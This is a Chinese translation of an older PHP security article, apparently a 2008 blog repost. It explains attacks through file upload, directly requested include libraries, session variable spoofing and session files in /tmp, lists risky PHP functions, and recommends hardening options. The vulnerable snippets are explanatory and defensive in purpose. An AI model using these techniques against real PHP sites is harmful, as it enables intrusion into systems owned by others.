获得执行任意指令的能力之后,攻击者显然想提升权限或者是扩大战果,而这又需要一些服务器上没有的工具 集,而文件上载又一次帮了我们这个忙。攻击者可以使用文件上载功能上载工具,把她们存在服务器上,然后利用他们执行指令的能力,使用chmod()改变文 件的权限,然后执行。例如:攻击者可以绕过防火墙或IDS上载一个本地root攻击程序,然后执行,这样就获得了root权限。

[库文件]

正如我们前面讨论的那样,include()和require()主要是为了支持代码库,因为我们一般是把一些经常使用的函数放到一个独立的文件中,这个独立的文件就是代码库,当需要使用其中的函数时,我们只要把这个代码库包含到当前的文件中就可以了。
最 初,人们开发和发布PHP程序的时候,为了区别代码库和主程序代码,一般是为代码库文件设置一个".inc"的扩展名,但是他们很快发现这是一个错误,因 为这样的文件无法被PHP解释器正确解析为PHP代码。如果我们直接请求服务器上的这种文件时,我们就会得到该文件的源代码,这是因为当把PHP作为 Apache的模块使用时,PHP解释器是根据文件的扩展名来决定是否解析为PHP代码的。扩展名是站点管理员指定的,一般是 ".php", ".php3"和".php4"。如果重要的配置数据被包含在没有合适的扩展名的PHP文件中,那么远程攻击者很容易得到这些信息。
最简单的解决方法就是给每个文件都指定一个PHP文件的扩展名,这样可以很好的防止泄露源代码的问题,但是又产生了新的问题,通过请求这个文件,攻击者可能使本该在上下文环境中运行的代码独立运行,这可能导致前面讨论的全部攻击。
下面是一个很明显的例子:
In main.php:
<?php
$libDir = "/libdir";
$langDir = "$libdir/languages";
...
include("$libdir/loadlanguage.php":
?>
In libdir/loadlanguage.php:
<?php
...
include("$langDir/$userLang");
?>
当 "libdir/loadlanguage.php" 被"main.php"调用时是相当安全的,但是因为"libdir/loadlanguage" 具有".php"的扩展名,因此远程攻击者可以直接请求 这个文件,并且可以任意指定"$langDir"和"$userLang"的值。

[Session文件]

PHP 4 或更新的版本提供了对sessions的支持,它的主要作用是在PHP程序中保存页与页之间的状态信息。例如,当一个用户登陆进入网站,他登陆了这个事 实以及谁登陆进入这个网站都被保存在session中,当他在网站中到处浏览时,所有的PHP代码都可以获得这些状态信息。
事实上, 当一个session启动时(实际上是在配置文件中设置为在第一次请求时自动启动),就会生成一个随机的"session id",如果远程浏览器总是在发送请求时提交这个"session id"的话,session就会一直保持。这通过Cookie很容易实现,也可以通过在每页提交一个表单变量(包含"session id")来实现。PHP程序可以用session注册一个特殊的变量,它的值会在每个PHP脚本结束后存在session文件中,也会在每个PHP脚本开 始前加载到变量中。下面是一个简单的例子:
<?php
session_destroy(); // Kill any data currently in the session
$session_auth = "shaun";
session_register("session_auth"); // Register $session_auth as a session variable
?>
新版本的PHP都会自动把"$session_auth"的值设置为"shaun",如果它们被修改的话,以后的脚本都会自动接受修改后的值,这对无状态的Web来说的确是种很不错的工具,但是我们也应该小心。
一个很明显的问题就是确保变量的确来自session,例如,给定上面的代码,如果后续的脚本是下面这样的话:
<?php
if (!empty($session_auth))
// Grant access to site here
?>
上 面的代码假定如果"$session_auth"被置位的话,就是从session,而不是从用户输入来置位的,如果攻击者通过表单输入来置位的话,他就 可以获得对站点的访问权。注意攻击者必须在session注册该变量之前使用这种攻击方法,一旦变量被放进了session,就会覆盖任何表单输入。
Session 数据一般是保存在文件中(位置是可配置的,一般是"/tmp"),文件名一般是类似 "sess_<session id>"的形式,这个文件包含变量名称,变量类型,变量值和一些其它的数据。在多主机系统中,因为文件是以运行Web服务器的用户身份(一般是 nobody)保存的,因此恶意的站点拥有者就可以通过创建一个session文件来获得对其它站点的访问,甚至可以检查session文件中的敏感信 息。
Session机制也为攻击者把自己的输入保存在远程系统的文件中提供了另一个方便的地方,对于上面的例子来说,攻击者需要在远 程系统放置一个包含PHP代码的文件,如果不能利用文件上载做到的话,他通常会利用session为一个变量按照自己的意愿赋一个值,然后猜测 session文件的位置,而他知道文件名是"php<session id>",所以只需猜测目录,而目录一般就是 "/tmp"。
另外,攻击者可以任意指定"session id"(例如"hello"),然后用这个"session id"创建一个session文件(例如"/tmp/sess_hello"),但是"session id"只能是字母和数字组合。

[数据类型]

PHP 具有比较松散的数据类型,变量的类型依赖于它们所处的上下文环境。例如:"$hello"开始是字符串变量,值为"",但是在求值时,就变成了整形变量 "0",这有时可能会导致一些意想不到的结果。如果"$hello"的值为"000"还是为"0"是不同的,empty()返回的结果也不会为真。
PHP中的数组是关联数组,也就是说,数组的索引是字符串型的。这意味着"$hello["000"]"和"$hello[0]"也是不同的。
开发程序的时候应该仔细地考虑上面的问题,例如,我们不应该在一个地方测试某个变量是否为"0",而在另外的地方使用empty()来验证。

[容易出错的函数]

我们在分析PHP程序中的漏洞时,如果能够拿到源代码的话,那么一份容易出错的函数列表则是我们非常需要的。如果我们能够远程改变这些函数的参数的话,那么我们就很可能发现其中的漏洞。下面是一份比较详细的容易出错的函数列表:

<PHP代码执行>

require():读取指定文件的内容并且作为PHP代码解释
include():同上
eval():把给定的字符串作为PHP代码执行
preg_replace():当与"/e"开关一起使用时,替换字符串将被解释为PHP代码

<命令执行>

exec():执行指定的命令,返回执行结果的最后一行
passthru():执行指定命令,返回所有结果到客户浏览器
``:执行指定命令,返回所有结果到一个数组
system():同passthru(),但是不处理二进制数据
popen():执行指定的命令,把输入或输出连接到PHP文件描述符

<文件泄露>

fopen():打开文件,并对应一个PHP文件描述符
readfile():读取文件的内容,然后输出到客户浏览器
file():把整个文件内容读到一个数组中
译者注:其实这份列表还不是很全,比如"mail()"等命令也可能执行命令,所以需要自己补充一下。

[如何增强PHP的安全性]

我在上面介绍的所有攻击对于缺省安装的PHP 4都可以很好的实现,但是我已经重复了很多次,PHP的配置非常灵活,通过配置一些PHP选项,我们完全可能抵抗其中的一些攻击。下面我按照实现的难度对一些配置进行了分类:
*低难度
**中低难度
***中高难度
****高难度
上面的分类只是个人的看法,但是我可以保证,如果你使用了PHP提供的所有选项的话,那么你的PHP将是很安全的,即使是第三方的代码也是如此,因为其中很多功能已经不能使用。
**** 设置"register_globals"为"off"
这 个选项会禁止PHP为用户输入创建全局变量,也就是说,如果用户提交表单变量"hello",PHP不会创建"$ hello",而只会创建 "HTTP_GET/POST_VARS['hello']"。这是PHP中一个极其重要的选项,关闭这个选项,会给编程带来很 大的不便。
*** 设置"safe_mode"为"on"
打开这个选项,会增加如下限制:
1. 限制哪个命令可以被执行
2. 限制哪个函数可以被使用
3. 基于脚本所有权和目标文件所有权的文件访问限制
4. 禁止文件上载功能
这对于ISP来说是一个伟大的选项,同时它也能极大地改进PHP的安全性。
** 设置"open_basedir"
这个选项可以禁止指定目录之外的文件操作,有效地消除了本地文件或者是远程文件被include()的攻击,但是仍需要注意文件上载和session文件的攻击。
** 设置"display_errors"为"off",设置"log_errors"为"on"
这个选项禁止把错误信息显示在网页中,而是记录到日志文件中,这可以有效的抵制攻击者对目标脚本中函数的探测。
* 设置"allow_url_fopen"为"off"
这个选项可以禁止远程文件功能,极力推荐!

]]> 2008-07-29T22:01:28Z